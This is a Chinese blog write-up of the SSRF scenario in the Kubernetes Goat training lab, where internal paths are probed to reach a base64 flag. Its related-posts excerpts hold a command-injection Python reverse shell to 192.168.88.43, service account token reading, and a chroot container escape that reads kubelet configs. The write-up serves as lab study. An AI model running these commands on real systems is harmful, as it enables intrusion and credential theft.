Kubernetes Goat 03 - SSRF in the Kubernetes (K8S) world
发表于|更新于|Kubernetes安全
|浏览量:
SSRF in the Kubernetes (K8S) world

- SSRF 可以使用bp抓包爆破判断端口号
- 找到5000端口

- 根据回显继续访问
- 找到新的路径

- 继续往下拼接

- 就这样以此类推
1 | http://metadata-db/latest/secrets/kubernetes-goat |

- 解密
1 | azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI= |

1 | k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab |
文章作者: putdown
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog!
相关推荐
2023-10-27
Kubernetes Goat 02 - docker in docker
Kubernetes Goat 02 - docker in docker 靶机ip:http://192.168.72.129:1231/ 能执行ping命令 职业习惯加个管道符 反弹shell 尝试使用bash来反弹没有成功 使用python反弹执行成功 监听 执行命令 1192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' 判断环境 ls -la mount docker in docker “Docker in Docker” (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器,而无需在宿主机上安装 Docker。 doc...
2023-10-31
Kubernetes Goat 16 - RBAC least privileges misconfiguration
RBAC least privileges misconfigurationRBAC 最低特权配置错误 由于Kubernetes默认情况下将所有secrets、tokens和service accounts信息都存储在一个固定的目录。直接访问这个目录,查找敏感的信息: 1cd /var/run/secrets/kubernetes.io/serviceaccount/ 要指向内部 API 服务器主机名,我们可以从环境变量中导出它 1export APISERVER=https://${KUBERNETES_SERVICE_HOST} 设置 ServiceAccount 令牌的路径 1export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount 设置命名空间值 1export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) 读取 ServiceAccount token 1export TOKEN=$...
2023-10-28
Kubernetes Goat 06 - Kubernetes CIS benchmarks analysis
Kubernetes CIS benchmarks analysisK8S CIS基线分析1cd /kubernetes-goat 12kubectl apply -f scenarios/kube-bench-security/node-job.yamlkubectl apply -f scenarios/kube-bench-security/master-job.yaml 1kubectl get pod 1kubectl logs -f kube-bench-master-xf2x9 结束
2023-10-26
Kubernetes Goat靶场搭建
前提 前置条件:确保您拥有 Kubernetes 集群的管理员访问权限并安装了kubectl k8s环境可参考:https://blog.putdown.top/archives/a31b6d49.html 介绍 靶场地址:https://github.com/madhuakula/kubernetes-goat 实验环境:安装minikube后的 Ubuntu 22.04的虚拟机 靶场内容12345678910111213141516171819202122Sensitive keys in codebasesDIND (docker-in-docker) exploitationSSRF in the Kubernetes (K8S) worldContainer escape to the host systemDocker CIS benchmarks analysisKubernetes CIS benchmarks analysisAttacking private registryNodePort exposed servicesHelm v2 tiller t...
2023-10-30
Kubernetes Goat 15 - Hidden in layers
Hidden in layers隐藏在层中1kubectl get jobs 1kubectl describe job 找到hidden-in-layers-czrlb 1kubectl get pod hidden-in-layers-czrlb -o yaml 找到完整的镜像名字,拉取镜像 1docker pull madhuakula/k8s-goat-hidden-in-layers:latest 通过利用 docker 内置命令将 docker 镜像导出为 tar 文件 1docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers.tar 使用dive分析镜像 https://github.com/wagoodman/dive/releases 1./dive madhuakula/k8s-goat-hidden-in-layers 得知敏感文件和路径 解压上面的的hidden-in-layers.tar文件 根据上面的路径找到文件 结束
2023-10-28
Kubernetes Goat 04 - Container escape to the host system
Container escape to the host system 查看环境 查看挂载 mount/df -Th 找到挂载目录ls -la /host-system 切换到宿主机的目录1chroot /host-system bash docker ps 查看k8s配置文件 1cat /etc/kubernetes/controller-manager.conf 可使用kubectl利用配置文件获取集群内的所有资源。 1kubectl --kubeconfig /etc/kubernetes/kubelet.conf get all -n kube-system 1kubectl --kubeconfig /etc/kubernetes/kubelet.conf get pod
